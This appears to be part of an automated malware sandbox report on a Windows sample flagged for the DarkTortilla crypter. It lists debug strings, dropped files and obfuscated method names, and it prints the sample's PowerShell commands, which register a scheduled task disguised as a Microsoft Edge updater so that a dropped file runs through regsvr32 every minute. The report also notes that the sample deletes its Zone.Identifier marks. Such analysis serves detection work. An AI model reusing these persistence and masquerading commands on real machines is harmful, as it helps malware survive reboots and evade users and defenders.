Source:	Binary string: System.Windows.Forms.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2547096108.0000015A03E80000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2549741435.0000015A04B71000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ComponentModel.Primitives.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2537212658.0000015A01960000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537029867.0000015A01941000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.Common.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2552832686.0000015A05D40000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2553181654.0000015A05EC1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Windows.Forms.Primitives/Release/net8.0/System.Windows.Forms.Primitives.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545731427.0000015A03AE0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2551609505.0000015A05861000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2544950241.0000015A039E0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545060158.0000015A03A21000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.TypeConverter\Release\net8.0\System.ComponentModel.TypeConverter.pdbSHA256m source: lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: lO5lV39HDj.exe, 00000001.00000002.2536927509.0000015A01930000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Security.Principal.Windows.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545250432.0000015A03A60000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545423139.0000015A03A91000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: lO5lV39HDj.exe, 00000001.00000000.1284026782.00007FF78F5D8000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: /_/artifacts/obj/System.Resources.Extensions/Release/net8.0/System.Resources.Extensions.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2553574496.0000015A06171000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: lO5lV39HDj.exe, 00000001.00000002.2552832686.0000015A05D40000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2553181654.0000015A05EC1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2546730732.0000015A03E20000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2546471783.0000015A03E11000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: lO5lV39HDj.exe, 00000001.00000002.2546297662.0000015A03DD0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2544950241.0000015A039E0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545060158.0000015A03A21000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Private.CoreLib.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: lO5lV39HDj.exe, 00000001.00000002.2536856455.0000015A01920000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Specialized.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538440372.0000015A01E80000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538222329.0000015A01E61000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ComponentModel.TypeConverter.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Runtime.InteropServices.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538679254.0000015A01EC1000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538522345.0000015A01EA0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538861845.0000015A01EE0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542196154.0000015A02CA1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Security.Claims.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.TraceSource\Release\net8.0\System.Diagnostics.TraceSource.pdb source: lO5lV39HDj.exe, 00000001.00000002.2542598060.0000015A02D11000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542478310.0000015A02CE0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256- source: lO5lV39HDj.exe, 00000001.00000002.2546798617.0000015A03E40000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: lO5lV39HDj.exe, 00000001.00000002.2537212658.0000015A01960000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537029867.0000015A01941000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256 source: lO5lV39HDj.exe, 00000001.00000002.2546297662.0000015A03DD0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Windows.Forms/Release/net8.0/System.Windows.Forms.pdb source: lO5lV39HDj.exe, 00000001.00000002.2547096108.0000015A03E80000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2549741435.0000015A04B71000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdbSHA256 source: lO5lV39HDj.exe, 00000001.00000002.2536856455.0000015A01920000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.pdbhP source: powershell.exe, 00000004.00000002.1342379280.000002B796676000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.TypeConverter\Release\net8.0\System.ComponentModel.TypeConverter.pdb source: lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: lO5lV39HDj.exe, 00000001.00000002.2553504188.0000015A06160000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Threading.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538861845.0000015A01EE0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542196154.0000015A02CA1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: lO5lV39HDj.exe, 00000001.00000002.2536927509.0000015A01930000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Resources.Extensions.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2553574496.0000015A06171000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538679254.0000015A01EC1000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538522345.0000015A01EA0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: lO5lV39HDj.exe, 00000001.00000002.2546730732.0000015A03E20000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2546471783.0000015A03E11000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538440372.0000015A01E80000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538222329.0000015A01E61000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: lO5lV39HDj.exe, 00000001.00000002.2537916593.0000015A01E10000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537711872.0000015A01DF1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545250432.0000015A03A60000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545423139.0000015A03A91000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.Primitives.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2537916593.0000015A01E10000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537711872.0000015A01DF1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: BT.tmp, 0000000D.00000003.1508966158.00000000034F8000.00000004.00001000.00020000.00000000.sdmp, BT.tmp, 0000000D.00000003.1506501307.00000000031C0000.00000004.00001000.00020000.00000000.sdmp

Source: lO5lV39HDj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: lO5lV39HDj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: lO5lV39HDj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: lO5lV39HDj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: lO5lV39HDj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 20.2.ST.exe.63f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.ST.exe.63f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2603458986.00000000063F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2550460561.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Suspicious powershell command line found

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{05493815-7F3D-43AF-9EBD-81B00854A622}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{05493815-7F3D-43AF-9EBD-81B00854A622}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline"			Jump to behavior

Source: _isdecmp.dll.13.dr	Static PE information: real checksum: 0x0 should be: 0x5528
Source: BT.tmp.12.dr	Static PE information: real checksum: 0x0 should be: 0x141a33
Source: BT.tmp.14.dr	Static PE information: real checksum: 0x0 should be: 0x141a33
Source: _setup64.tmp.13.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: _setup64.tmp.15.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: is-N5K6F.tmp.15.dr	Static PE information: real checksum: 0x0 should be: 0x1481ac
Source: BT.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x343358
Source: 0nzyxcux.dll.6.dr	Static PE information: real checksum: 0x0 should be: 0x24a9
Source: _isdecmp.dll.15.dr	Static PE information: real checksum: 0x0 should be: 0x5528
Source: is-SHGPV.tmp.15.dr	Static PE information: real checksum: 0x4447c3 should be: 0x442ab4

Source: lO5lV39HDj.exe	Static PE information: section name: .CLR_UEF
Source: lO5lV39HDj.exe	Static PE information: section name: .didat
Source: lO5lV39HDj.exe	Static PE information: section name: Section
Source: lO5lV39HDj.exe	Static PE information: section name: _RDATA
Source: is-SHGPV.tmp.15.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A017F3F8E push rsi; ret	1_2_0000015A017F3F90
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A223B2 push rdi; retf	1_2_0000015A03A223B3
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A2558A push rsp; retf	1_2_0000015A03A2558B
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A22372 push rax; retf	1_2_0000015A03A22373
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A248F2 push rdx; iretd	1_2_0000015A03A24905
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A93520 push rsi; retf	1_2_0000015A03A93528
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A94320 push rbp; iretd	1_2_0000015A03A9432F
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A9204C push rbp; ret	1_2_0000015A03A9204D
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A93E22 push rsi; ret	1_2_0000015A03A93E4E
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A05EC3397 push rbp; retf	1_2_0000015A05EC3398
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A05EC33DF push rbp; retf	1_2_0000015A05EC33E0
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A05EC33D0 push rbp; retf	1_2_0000015A05EC33D1
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A05EC33A4 push rbp; retf	1_2_0000015A05EC33A5
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A05EC341D push rbp; retf	1_2_0000015A05EC341E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7C013D2A5 pushad ; iretd	8_2_00007FF7C013D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7C0251DC5 push esp; iretd	8_2_00007FF7C0252033
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7C0251FF2 push esp; iretd	8_2_00007FF7C0252033
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7C0252045 push esp; iretd	8_2_00007FF7C0252033
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7C0250875 push E95E503Ch; ret	8_2_00007FF7C0250899
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7C03202F8 push eax; ret	8_2_00007FF7C03202F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF7C0322316 push 8B485F91h; iretd	8_2_00007FF7C032231B
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BF81D2A5 pushad ; iretd	17_2_00007FF7BF81D2A6
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BF9300BD pushad ; iretd	17_2_00007FF7BF9300C1
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BF93D640 push eax; iretd	17_2_00007FF7BF93D661
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BF937969 push ebx; retf	17_2_00007FF7BF93796A
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBB54C9 push ecx; retf	17_2_00007FF7BFBB59DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBB2099 push edx; ret	17_2_00007FF7BFBB209A
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBB2048 push eax; ret	17_2_00007FF7BFBB205A
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBB14FA push cs; ret	17_2_00007FF7BFBB1532
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBB12F3 push cs; ret	17_2_00007FF7BFBB1532
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBB12AB push cs; ret	17_2_00007FF7BFBB1532

Source: ST.exe.1.dr, q3YDo9i.cs	High entropy of concatenated method names: 'Hw37ZfD', 'Mf91Xsw', 'n9CPk02', 'Rj4o7G6', 'o4LAr8n', 'Rj5r9X1', 'e9Y4AwQ', 'f4CDy65', 'Kr7p5H9', 'w8J2QiG'
Source: ST.exe.1.dr, Rg3e9A8.cs	High entropy of concatenated method names: 'Qx65CsT', 'Hs9i2T3', 'm2T7Bab', 'g7FAb9r', 's9YLw46', 'Hw2n8NW', 's0MSn7b', 'Ke6b7TW', 'b9TJs26', 'Fg61JrZ'
Source: ST.exe.1.dr, m3D2P.cs	High entropy of concatenated method names: 'Xx49E', 'e6C0R', 'Fm14R', 'Rz72J', 'Aj72Z', 't4KPa', 'Cg0p6', 'z8SLf', 'y8XAm', 'Ha95S'
Source: ST.exe.1.dr, a9C1Y.cs	High entropy of concatenated method names: 'Ko1x8', 'MoveNext', 'Fg9d4', 'SetStateMachine', 'Fr37P', 'j5GHn', 'Ef0m5Y4', 'q6HFg', 'g3WMd', 'Mo83G'

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	File created: C:\Users\user\Downloads\BT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	File created: C:\Users\user\AppData\Roaming\d3d9_4.drv (copy)	Jump to dropped file
Source: C:\Users\user\Downloads\BT.exe	File created: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	File created: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	File created: C:\Users\user\AppData\Local\Temp\is-RK870.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	File created: C:\Users\user\AppData\Local\Temp\is-RK870.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	File created: C:\Users\user\AppData\Local\Temp\is-DN1EJ.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	File created: C:\Users\user\Downloads\ST.exe	Jump to dropped file
Source: C:\Users\user\Downloads\BT.exe	File created: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	File created: C:\Users\user\AppData\Local\Temp\is-RK870.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	File created: C:\Users\user\AppData\Roaming\is-SHGPV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	File created: C:\Users\user\AppData\Local\Temp\is-DN1EJ.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	File created: C:\Users\user\AppData\Local\Temp\is-DN1EJ.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	File created: C:\Users\user\AppData\Local\is-N5K6F.tmp	Jump to dropped file

Boot Survival

Uses Register-ScheduledTask to add task schedules

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{05493815-7F3D-43AF-9EBD-81B00854A622}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Windows\system32\regsvr32.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\Downloads\ST.exe	File opened: C:\Users\user\Downloads\ST.exe\:Zone.Identifier read attributes \| delete

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
